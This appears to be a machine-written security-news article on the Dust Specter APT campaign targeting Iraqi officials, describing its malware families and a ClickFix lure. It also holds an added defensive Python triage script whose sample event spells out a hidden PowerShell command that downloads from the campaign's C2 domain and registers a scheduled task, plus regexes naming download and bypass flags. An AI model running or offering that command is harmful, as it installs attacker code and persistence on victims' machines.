Ethical Hacking News
Iran-nexus APT Dust Specter has been linked to a recent campaign targeting Iraqi officials with phishing emails delivering new malware families. The attackers used sophisticated tactics, including password-protected archives, droppers disguised as legitimate software applications, and C2 servers with randomized delays to evade detection. This incident highlights the growing concern of Iranian threat actors expanding their reach into new regions and targeting high-value targets.
Iran-nexus APT Dust Specter, a sophisticated threat actor linked to Iranian intelligence operations, has been identified as the perpetrator behind a recent campaign targeting Iraqi officials with phishing emails delivering new malware families. The campaign, which began in January 2026, utilized previously unseen malware families including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM, through multiple infection chains.
The attackers impersonated Iraq's Ministry of Foreign Affairs in phishing messages that delivered these malicious payloads, exploiting the human element to gain access to high-value targets. Dust Specter is an Iran-nexus APT, a well-documented Iranian threat actor known for its sophisticated cyber-espionage operations and targeting of government officials.
The attackers used various tactics, techniques, and procedures (TTPs) typical of Iranian threat actors, including password-protected archives, droppers disguised as legitimate software applications, and C2 servers with randomized delays and custom URI paths to evade detection.
ThreatLabz researchers analyzed two attack chains used in the Dust Specter campaign, highlighting the sophistication of the threat actor's tactics. Attack Chain 1 began with a password-protected archive containing a dropper named SPLITDROP, disguised as a WinRAR application. Once executed, it decrypted and deployed two modules: TWINTASK, a worker component that executed PowerShell commands from a local file, and TWINTALK, a command-and-control (C2) orchestrator.
Attack Chain 2 used GHOSTFORM, which consolidated the same functionality into a single binary that executed commands directly in memory, reducing filesystem traces. It also opened a fake Google Form posing as a survey from Iraq's Ministry of Foreign Affairs to lure victims. The malware employed stealth techniques such as invisible Windows forms for delayed execution and mutex checks to avoid running multiple instances.
ThreatLabz researchers identified unusual elements in the code, including emojis and Unicode text embedded in functions, suggesting that generative AI may have been used to develop the TWINTALK and GHOSTFORM malware. This finding highlights the growing use of artificial intelligence in malware development, a trend that is expected to continue as threat actors seek to stay ahead of security measures.
The campaign also utilized a ClickFix lure disguised as a Cisco Webex meeting page to trick victims into running malicious PowerShell commands that download and schedule malware execution. The attackers used a C2 domain, meetingapp[.]site, to host a web page disguised as a Cisco Webex meeting invitation, further demonstrating their sophistication in impersonating legitimate platforms to deliver malicious payloads.
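From a detection standpoint, the ClickFix chain described above leaves a recognizable trace: a PowerShell process spawned from an interactive parent whose command line combines a download primitive, a scheduled-task creation and the C2 domain. The following Python is an added triage example, not code from the article or from ThreatLabz; the process-creation events, field names and the `EXAMPLE_PATH` URI are constructed, and only the domain meetingapp[.]site comes from the page.

```python
import re

# Indicator taken from the article, refanged from meetingapp[.]site before matching.
C2_DOMAINS = {"meetingapp.site"}

# Download primitives commonly seen in ClickFix-style PowerShell one-liners.
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|start-bitstransfer)\b", re.I)
# Persistence via scheduled task, which the article says the lure's command sets up.
SCHEDULE_RE = re.compile(r"(schtasks(\.exe)?\s+/create|register-scheduledtask)", re.I)
# Flags that hide the window or weaken policy; rarely typed by admins by hand.
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-encodedcommand", re.I)
# A paste into the Run dialog or a console opened from Explorer shows up with this parent.
INTERACTIVE_PARENTS = {"explorer.exe"}

def refang(text):
    return text.replace("[.]", ".")

def score_event(evt):
    """Score one process-creation event (a dict); returns (score, reasons)."""
    cmd = refang(evt.get("CommandLine", ""))
    image = evt.get("Image", "").lower()
    parent = evt.get("ParentImage", "").lower().split("\\")[-1]
    reasons = []
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    if DOWNLOAD_RE.search(cmd): reasons.append("download-primitive")
    if SCHEDULE_RE.search(cmd): reasons.append("scheduled-task-persistence")
    if HIDDEN_RE.search(cmd): reasons.append("hidden-or-bypass-flags")
    if parent in INTERACTIVE_PARENTS: reasons.append("interactive-parent")
    if any(d in cmd.lower() for d in C2_DOMAINS): reasons.append("known-c2-domain")
    return len(reasons), reasons

def triage(events, threshold=3):
    """Return events at or above threshold, highest score first."""
    hits = [{"score": s, "reasons": r, "event": e}
            for e in events for s, r in [score_event(e)] if s >= threshold]
    return sorted(hits, key=lambda h: -h["score"])

# Constructed sample events: one ClickFix-style paste, one admin task, one plain download.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iwr https://meetingapp[.]site/EXAMPLE_PATH "
                    "-OutFile $env:TEMP\\u.ps1; schtasks /create /tn Updater /tr $env:TEMP\\u.ps1\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -c \"Get-Service | Export-Csv svc.csv\""},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "ParentImage": r"C:\Tools\code.exe",
     "CommandLine": "pwsh -c \"Invoke-WebRequest https://example.internal/tool.zip -OutFile tool.zip\""},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"])
```

Only the first constructed event crosses the threshold; the legitimate download in the third event scores a single point, which is the behaviour a tuned rule should show.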
ThreatLabz attributes the activity to Dust Specter, an Iran-linked threat actor, citing targeting patterns, malware design, and tactics consistent with previous Iranian cyber-espionage operations. The campaign likely targeted government officials using convincing social engineering lures impersonating Iraq's Ministry of Foreign Affairs.
This incident highlights the growing concern of Iranian threat actors expanding their reach into new regions and targeting high-value targets. As cybersecurity measures continue to evolve, threat actors are adapting and improving their tactics, making it essential for organizations and governments to stay vigilant and implement robust security protocols to protect against such threats.
In conclusion, the Dust Specter campaign marks a significant escalation in Iranian cyber-espionage operations, with sophisticated tactics and techniques used to target high-value targets. As the threat landscape continues to evolve, it is crucial for organizations and governments to remain proactive in monitoring and mitigating the risks posed by such threats.
Published: Fri Mar 6 06:41:56 2026 by llama3.2 3B Q4_K_M